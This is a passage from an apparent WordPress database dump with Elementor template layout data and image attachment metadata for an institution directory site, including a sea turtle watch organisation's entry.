elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(30643,4288,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(30644,4288,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(30660,4290,'_elementor_edit_mode','builder'),(30661,4290,'_elementor_template_type','single-post'),(30662,4290,'_elementor_version','3.4.3'),(30663,4290,'_elementor_pro_version','3.3.6'),(30664,4290,'_wp_page_template','default'),(30665,4290,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"bcc8fe1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"9e89f61\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"3d1d791\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"e0ed79b\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}},{\"type\":\"comments\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"803e164\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\"}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"text_color\":\"#02010154\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c755a3b\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"482e8d8\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"custom_text\":\"Go to Institution\'s Website\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_url\":\"[elementor-tag id=\\\"3980bf4\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"}}]},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(30667,4290,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(30668,4290,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(30671,4291,'_elementor_edit_mode','builder'),(30672,4291,'_elementor_template_type','single-post'),(30673,4291,'_elementor_version','3.4.3'),(30674,4291,'_elementor_pro_version','3.3.6'),(30675,4291,'_wp_page_template','default'),(30676,4291,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"bcc8fe1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"9e89f61\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"3d1d791\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"e0ed79b\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}},{\"type\":\"comments\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"803e164\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\"}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"text_color\":\"#02010154\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c755a3b\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"482e8d8\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"custom_text\":\"Go to Institution\'s Website\",\"custom_url\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"show_icon\":\"none\",\"__dynamic__\":{\"custom_url\":\"[elementor-tag id=\\\"3980bf4\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"}}],\"text_color\":\"#008000\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(30678,4291,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(30679,4291,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(30682,2419,'_last_editor_used_jetpack','classic-editor'),(30685,4293,'_wp_attached_file','2021/09/MOA_news_photo.jpeg'),(30686,4293,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:447;s:4:\"file\";s:27:\"2021/09/MOA_news_photo.jpeg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-300x131.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-768x335.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:26:\"MOA_news_photo-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-370x447.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-570x447.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-600x262.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:27:\"MOA_news_photo-640x447.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(30821,4301,'_last_editor_used_jetpack','classic-editor'),(30822,4301,'_edit_lock','1631275198:43'),(30823,4301,'_edit_last','43'),(30824,4302,'_wp_attached_file','2021/09/logo.png'),(30825,4302,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:281;s:6:\"height\";i:76;s:4:\"file\";s:16:\"2021/09/logo.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"logo-150x76.png\";s:5:\"width\";i:150;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"logo-150x76.png\";s:5:\"width\";i:150;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"logo-230x76.png\";s:5:\"width\";i:230;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30826,4303,'_wp_attached_file','2021/09/featured_image_stw.png'),(30827,4303,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:30:\"2021/09/featured_image_stw.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:29:\"featured_image_stw-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:30:\"featured_image_stw-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30828,4301,'_thumbnail_id','4303'),(30829,4301,'_wp_page_template','default'),(30830,4301,'internet','http://seaturtlewatchlr.org/'),(30831,4301,'_pods_institution_logo','a:1:{i:0;i:4302;}'),(30832,4301,'institution_logo','4302'),(30836,4306,'_wp_attached_file','2021/09/cover_photo.png'),(30837,4306,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:724;s:6:\"height\";i:462;s:4:\"file\";s:23:\"2021/09/cover_photo.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"cover_photo-300x191.png\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"cover_photo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"cover_photo-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:22:\"cover_photo-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:23:\"cover_